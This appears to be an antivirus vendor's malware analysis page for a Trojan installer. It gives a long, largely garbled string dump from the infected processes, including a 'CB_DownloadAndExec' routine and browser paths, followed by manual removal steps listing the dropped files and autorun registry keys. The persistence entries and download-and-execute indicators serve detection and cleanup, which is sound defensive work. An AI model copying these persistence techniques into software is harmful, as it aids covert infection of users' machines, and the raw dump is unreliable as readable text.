cannot join using column %s - column not present in both tables

USE TEMP B-TREE FOR %s

COMPOUND SUBQUERIES %d AND %d %s(%s)

%s.%s

ORDER BY clause should come after %s not before

LIMIT clause should come after %s not before

SELECTs to the left and right of %s do not have the same number of result columns

no such index: %s

sqlite_subquery_%p_

no such table: %s

SCAN TABLE %s %s%s(~%d rows)

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create INSTEAD OF trigger on table: %S

no such trigger: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

-- TRIGGER %s

no such column: %s

cannot VACUUM - SQL statements in progress

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor failed: %s

vtable constructor did not declare schema: %s

no such module: %s

table %s: xBestIndex returned an invalid plan

%s SUBQUERY %d

%s TABLE %s

%s AS %s

%s USING %s%sINDEX%s%s%s

%s USING INTEGER PRIMARY KEY

%s (rowid=?)

%s (rowid>? AND rowid<?)

%s (rowid>?)

%s (rowid<?)

%s VIRTUAL TABLE INDEX %d:%s

%s (~%lld rows)

at most %d tables in a join

cannot use index: %s

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

unable to close due to unfinished backup operation

SQL logic error or missing database

large file support is disabled

unknown database: %s

no such %s mode: %s

%s mode not allowed: %s

no such vfs: %s

database corruption at line %d of [%.10s]

misuse at line %d of [%.10s]

cannot open file at line %d of [%.10s]

.?AVUrlCatcher@@

Inappropriate I/O control opera

"appDomain": "upd.adskyforever.com"

cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

0"1 3$3(3,3

7(9.9|9^:

=0>4>8><>@>

; ;$;(;,;0;4;

1 1$1(1,10141

3 3$3(3,3034383<3

0u0

4-5L5}5

6!6(616=6

7-787@7_7|7

4M4I4Z4j4

223f3

1!2(272>2

6!6 616}6

3$464`4~4

4"4(4.444

2"2X2

9-9F9Q9Z9s9}9

6#727>7|7

=#=9=@=\=|=

9%9;9%:;:

%0X0v0

:%: :2:=:^:~:

0%1S1d1n1

<#=*=?={=

;@=}=7>@>

1-3

0 0$0(0,0004080{0

2,2b2o2

8%8S8Z8c8l8

1-141C1M1g1n1}1

2 3$3(3,3034383<3!4}4

?(?,?0?4?8?<?[?

: :$:(:,:0:

01

;,;0;4;8;<;@;

: :$:(:,:0:4:8:<:@:

: :$:(:,:0:4:8:<:

=$=4=<=@=

< <$<(<,<0<4<

9$9,989\9|9

4 4@4\4|4

4 4$4(4,4044484<4@4`4

4 4$4(4,4

3 3$3(3,30343<3`3

CB_OpenUrl

CB_NavOpenUrl

CB_DownloadAndExec

background-url

\Internet Explorer\iexplore.exe

%s\Google\Chrome\Application\chrome.exe

Chrome

\Mozilla Firefox\firefox.exe

Firefox

Mozilla

\*.default

\places.sqlite

comctl32.dll

comdlg32.dll

shell32.dll

%s (%s:%d)

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

Advapi32.dll

accKeyboardShortcut

wuser32.dll

hhctrl.ocx

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

Afx:%p:%x:%p:%p:%p

Afx:%p:%x

commctrl_DragListMsg

kernel32.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

dwmapi.dll

UxTheme.dll

eShell32.dll

%s:%x:%x:%x:%x

MFCLink_UrlPrefix

MFCLink_Url

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

%sMFCToolBar-%d%x

%sMFCToolBar-%d

%sMFCToolBarParameters

TOOLBAR_RESETKEYBAORD

KeyboardManager

MSG_CHECKEMPTYMINIFRAME

%sDockingManager-%d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp

&%d %s

Hex={X,X,X}

ShowCmd

%sMDIClientArea-%d

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp

%sBasePane-%d%x

%sBasePane-%d

%sPane-%d%x

%sPane-%d

windows

%sMFCOutlookBar-%d%x

%sMFCOutlookBar-%d

%c%d%c%s

RGB(%d, %d, %d)

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp

%sDockablePaneAdapter-%d%x

%sDockablePaneAdapter-%d

ENABLE_KEYS

KEYS_MENU

KEYS

RICHED20.DLL

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp

%sMFCTasksPane-%d%x

%sMFCTasksPane-%d

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

Invalid parameter or key doesn't exist.

Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.

%s-tmp

"%s" "%s"

%s has stopped working

Error launching CrashSender.exe

The operation was cancelled by client.

Couldn't launch CrashSender.exe process.

Couldn't set C   exception handlers for main execution thread.

Couldn't create crash report directory.

%s\CrashRpt\UnsentCrashReports\%s_%s

Local\CrashRptEvent_%s

Couldn't load dbghelp.dll.

crashrpt_lang.ini

CrashSender.exe is not found in the specified path.

CrashSender%d.exe

%s %s Error Report

The flag CR_INST_STORE_ZIP_ARCHIVES should be used with CR_INST_DONT_SEND_REPORT flag.

Invalid registry key or invalid destination file is specified.

The registry key coudn't be open.

Empty subkey is not allowed.

HKEY_CURRENT_USER\

HKEY_LOCAL_MACHINE\

SOFTWARE\Microsoft\Windows NT\CurrentVersion

%u.%u.%u.%u

https

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

Correct password required

777705555443332

5555443332

5555443332

install.bat

\%s\%s\%s

\manifest.yaml

n.folder

ddebug.txt

%Program Files%\mpck\wincom_FYV.exe

iexplore.exe_3752:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... )) 

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

iexplore.exe_788:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... )) 

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

setup.exe_2104_rwx_69722000_00002000:

.ri3J

-yiq.yiw

-yiq.yi

8G0VBB.exe_2704_rwx_69722000_00002000:

.ri3J

-yiq.yiw

-yiq.yi

caster.exe_3788_rwx_00322000_00002000:

0343 3$3

caster.exe_3788_rwx_69722000_00002000:

.ri3J

-yiq.yiw

-yiq.yi

advise.exe_3996_rwx_69722000_00002000:

.ri3J

-yiq.yiw

-yiq.yi

9VW7H7KFES.exe_544_rwx_00262000_00002000:

0'4' '$'

9VW7H7KFES.exe_544_rwx_014C0000_00010000:

%8x[g

9VW7H7KFES.exe_544_rwx_69722000_00002000:

.ri3J

-yiq.yiw

-yiq.yi

R3VW2WN639.exe_1668_rwx_69722000_00002000:

.ri3J

-yiq.yiw

-yiq.yi

50U0P6CTE.exe_2996_rwx_69722000_00002000:

.ri3J

-yiq.yiw

-yiq.yi

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   cas.exe:3804
   W15R20Q1Q1.exe:1980
   %original file name%.exe:4008
   wincom_FYV.exe:192
   W15R20Q1Q1.tmp:2228
   8G0VBB.exe:2788
   R3VW2WN639.exe:2760
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Program Files%\YW6DQ3G9K4\50U0P6CTE.exe.config (1 bytes)
   %Program Files%\YW6DQ3G9K4\uninstaller.exe.config (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\cast.config (37 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-GQPFO.tmp\W15R20Q1Q1.tmp (1415 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-SGBAU.tmp\0861e59c41bb5f407dacedf51edab54f.tmp (1414 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\mfi8FD2.tmp (78068 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\gch8FD3.tmp (601 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\tuto_monetize_120161205\tuto_monetize_120161205\2.00\cnf.cyl (144 bytes)
   %Program Files%\mpck\unins000.dat (1374 bytes)
   %Program Files%\mpck\is-9N7HB.tmp (23473 bytes)
   %Program Files%\mpck\is-FHO2R.tmp (23062 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-8IB5S.tmp\_isetup\_shfoldr.dll (47 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\asasa.exe.config.config (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\caster.exe (19468 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\caster.exe.config.config (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\advise.exe (145773 bytes)
   %Program Files%\mpck\config.conf (35 bytes)
   %Program Files%\mpck\wincom_FYV.exe (335632 bytes)
   %Program Files%\mpck\uninstaller.exe (66563 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\W15R20Q1Q1.exe (81615 bytes)
   %Program Files%\mpck\8G0VBB.exe (49754 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\9VW7H7KFES.exe (7853 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\R3VW2WN639.exe (26266 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\idp.dll (1493 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\setup.exe (130856 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\_isetup\_shfoldr.dll (47 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\asasa.exe (208 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (44 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\appsoft.exe.config.config (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\cas.exe (744 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\asasa.exe.config.config (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\cas.exe.config.config (1 bytes)
   %Program Files%\YW6DQ3G9K4\cast.config (37 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "N5WHVTE233" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\9VW7H7KFES.exe"
   
   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "VA5YBTJ0T5" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\caster.exe"
   
   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
   "OTUTPRODUCT_6NAS9" = "%Program Files%\mpck\8G0VBB.exe"
   
   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "WINCOMFYV" = "%Program Files%\mpck\wincom_FYV.exe"
   
   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
   "OMEWPRODUCT_COMG6" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\R3VW2WN639.exe"
   
   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "JQRO84EYHS" = "%Program Files%\YW6DQ3G9K4\50U0P6CTE.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.